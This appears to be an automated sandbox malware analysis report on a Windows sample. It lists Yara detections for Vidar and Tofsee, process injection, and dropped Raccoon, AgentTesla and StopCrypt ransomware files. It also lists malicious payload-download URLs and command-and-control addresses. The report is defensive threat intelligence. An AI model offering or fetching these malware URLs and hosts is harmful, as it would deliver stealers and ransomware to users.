                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.rwjfsvd.5715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.eIxMVDoQF3.exe.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.1.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000F.00000002.382566740.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.382707049.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332260069.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332377268.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000000.318144404.0000000002E21000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000017.00000002.388045141.0000000000763000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.570e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.743F.exe.590000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000002.432619186.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.432841929.0000000000570000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000003.392346980.0000000000590000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 743F.exe PID: 6640, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Windows Management Instrumentation221DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools111OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsExploitation for Client Execution1Windows Service4Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter3Logon Script (Mac)Windows Service4Software Packing33NTDSSystem Information Discovery338Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsService Execution3Network Logon ScriptProcess Injection513Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery781VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol25Jamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading31Proc FilesystemVirtualization/Sandbox Evasion441Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion441Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection513KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553015 Sample: eIxMVDoQF3.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 70 host-data-coin-11.com 2->70 72 cdn.discordapp.com 2->72 102 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->102 104 Multi AV Scanner detection for domain / URL 2->104 106 Antivirus detection for URL or domain 2->106 108 14 other signatures 2->108 11 eIxMVDoQF3.exe 2->11         started        13 rwjfsvd 2->13         started        16 svchost.exe 2->16         started        18 11 other processes 2->18 signatures3 process4 dnsIp5 21 eIxMVDoQF3.exe 11->21         started        122 Machine Learning detection for dropped file 13->122 124 Contains functionality to inject code into remote processes 13->124 126 Injects a PE file into a foreign processes 13->126 24 rwjfsvd 13->24         started        128 Changes security center settings (notifications, updates, antivirus, firewall) 16->128 74 192.168.2.1 unknown unknown 18->74 26 WerFault.exe 18->26         started        signatures6 process7 signatures8 110 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->110 112 Maps a DLL or memory area into another process 21->112 114 Checks if the current machine is a virtual machine (disk enumeration) 21->114 28 explorer.exe 10 21->28 injected 116 Creates a thread in another existing process (thread injection) 24->116 process9 dnsIp10 78 185.233.81.115, 443, 49760 SUPERSERVERSDATACENTERRU Russian Federation 28->78 80 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 28->80 82 9 other IPs or domains 28->82 60 C:\Users\user\AppData\Roaming\rwjfsvd, PE32 28->60 dropped 62 C:\Users\user\AppData\Local\Temp\F805.exe, PE32 28->62 dropped 64 C:\Users\user\AppData\Local\Temp\F6C0.exe, PE32 28->64 dropped 66 10 other malicious files 28->66 dropped 130 System process connects to network (likely due to code injection or exploit) 28->130 132 Benign windows process drops PE files 28->132 134 Deletes itself after installation 28->134 136 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->136 33 7D0A.exe 3 28->33         started        36 B50.exe 28->36         started        38 743F.exe 2 28->38         started        41 F805.exe 28->41         started        file11 signatures12 process13 file14 84 Antivirus detection for dropped file 33->84 86 Multi AV Scanner detection for dropped file 33->86 88 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->88 98 2 other signatures 33->98 43 7D0A.exe 33->43         started        90 Detected unpacking (changes PE section rights) 36->90 92 Detected unpacking (overwrites its own PE header) 36->92 94 Found evasive API chain (may stop execution after checking mutex) 36->94 100 4 other signatures 36->100 58 C:\Users\user\AppData\Local\...\tvdcssmj.exe, PE32 38->58 dropped 96 Machine Learning detection for dropped file 38->96 47 cmd.exe 38->47         started        50 cmd.exe 38->50         started        52 WerFault.exe 3 10 41->52         started        signatures15 process16 dnsIp17 76 86.107.197.138, 38133, 49886 MOD-EUNL Romania 43->76 118 Tries to harvest and steal browser information (history, passwords, etc) 43->118 120 Tries to steal Crypto Currency Wallets 43->120 68 C:\Windows\SysWOW64\...\tvdcssmj.exe (copy), PE32 47->68 dropped 54 conhost.exe 47->54         started        56 conhost.exe 50->56         started        file18 signatures19 process20

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          eIxMVDoQF3.exe38%VirustotalBrowse
                          eIxMVDoQF3.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7D0A.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\F805.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\B50.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\tvdcssmj.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\E5C8.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\3A08.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\743F.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\7D0A.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\rwjfsvd100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1547.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\27D7.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\6CF.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\F6C0.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1FD7.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1FD7.exe34%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\1FD7.exe63%ReversingLabsWin32.Ransomware.StopCrypt
                          C:\Users\user\AppData\Local\Temp\3A08.exe86%ReversingLabsWin32.Trojan.Raccoon
                          C:\Users\user\AppData\Local\Temp\7D0A.exe46%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\7D0A.exe89%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                          C:\Users\user\AppData\Local\Temp\E5C8.exe34%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\E5C8.exe63%ReversingLabsWin32.Ransomware.StopCrypt
                          C:\Users\user\AppData\Local\Temp\F6C0.exe29%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\F6C0.exe81%ReversingLabsWin32.Trojan.Raccrypt

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          15.0.rwjfsvd.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                          23.2.B50.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          23.3.B50.exe.590000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          0.2.eIxMVDoQF3.exe.6515a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          15.2.rwjfsvd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          23.2.B50.exe.570e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          37.0.7D0A.exe.650000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          25.2.7D0A.exe.d70000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          25.0.7D0A.exe.d70000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          15.0.rwjfsvd.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                          37.0.7D0A.exe.650000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.1.eIxMVDoQF3.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.650000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          24.3.743F.exe.590000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          16.0.F805.exe.510e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          24.2.743F.exe.570e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.2.eIxMVDoQF3.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.650000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.0.F805.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          15.0.rwjfsvd.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                          37.0.7D0A.exe.650000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.2.F805.exe.510e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          14.2.rwjfsvd.5715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.650000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          15.0.rwjfsvd.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          15.0.rwjfsvd.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          25.0.7D0A.exe.d70000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.3.F805.exe.520000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          16.2.F805.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.0.7D0A.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          37.0.7D0A.exe.650000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          37.0.7D0A.exe.650000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.eIxMVDoQF3.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.eIxMVDoQF3.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          15.0.rwjfsvd.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          16.0.F805.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          25.0.7D0A.exe.d70000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          25.0.7D0A.exe.d70000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          37.0.7D0A.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          16.0.F805.exe.510e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.2.7D0A.exe.650000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          37.0.7D0A.exe.650000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          24.2.743F.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          37.0.7D0A.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          15.1.rwjfsvd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          37.2.7D0A.exe.400000.0.unpack100%AviraHEUR/AGEN.1145065Download File
                          1.0.eIxMVDoQF3.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          15.0.rwjfsvd.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://crl.ver)0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe16%VirustotalBrowse
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          https://dynamic.t0%URL Reputationsafe
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://data-host-coin-8.com/files/9042_1641895079_9876.exe13%VirustotalBrowse
                          http://data-host-coin-8.com/files/9042_1641895079_9876.exe100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          https://www.tiktok.com/legal/report0%URL Reputationsafe
                          http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                          https://goo.su/abhF0%Avira URL Cloudsafe
                          https://get.adob0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          unicupload.top
                          54.38.220.85
                          truefalse
                            high
                            host-data-coin-11.com
                            94.142.143.91
                            truefalse
                              high
                              cdn.discordapp.com
                              162.159.133.233
                              truefalse
                                high
                                goo.su
                                172.67.139.105
                                truefalse
                                  high
                                  transfer.sh
                                  144.76.136.153
                                  truefalse
                                    high
                                    a0621298.xsph.ru
                                    141.8.194.74
                                    truefalse
                                      high
                                      data-host-coin-8.com
                                      94.142.143.91
                                      truefalse
                                        high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://185.7.214.171:8080/6.phptrue
                                        • URL Reputation: malware
                                        unknown
                                        http://a0621298.xsph.ru/9.exefalse
                                          high
                                          http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                          • 16%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://data-host-coin-8.com/files/9042_1641895079_9876.exetrue
                                          • 13%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://transfer.sh/get/uq3XSe/5.exefalse
                                            high
                                            http://data-host-coin-8.com/game.exefalse
                                            • URL Reputation: safe
                                            unknown
                                            https://goo.su/abhFfalse
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/02/sc/sct7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtab7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://tempuri.org/Entity/Id12Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://tempuri.org/7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://tempuri.org/Entity/Id2Response7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha17D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://tempuri.org/Entity/Id21Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://support.google.com/chrome/?p=plugin_real7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/fault7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id15Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://api.ip.sb/ip7D0A.exe, 00000019.00000002.437060463.0000000004361000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://crl.ver)svchost.exe, 00000012.00000002.406719122.000001994C0EB000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA17D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id24Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://dynamic.tsvchost.exe, 00000006.00000003.308329739.000001F894E56000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://support.google.com/chrome/?p=plugin_shockwave7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id5Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id10Response7D0A.exe, 00000025.00000002.523154527.0000000002AF1000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
